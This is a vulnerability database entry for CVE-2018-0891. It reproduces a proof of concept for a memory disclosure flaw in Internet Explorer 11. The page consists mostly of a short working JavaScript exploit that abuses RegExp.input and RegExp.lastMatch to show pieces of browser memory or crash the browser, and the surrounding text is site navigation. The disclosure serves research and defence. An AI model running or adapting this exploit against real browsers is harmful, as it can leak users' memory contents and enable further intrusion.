Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-0891

Publish Date: 20 Mar 2018

                /*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:

=========================================
*/

&lt;!-- saved from url=(0014)about:internet --&gt;
&lt;script&gt;

function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

&lt;/script&gt;

/*
=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Internet Explorer - 'RegExp.lastMatch' Memory Disclosure

Vulmon Search

About

Products

Connect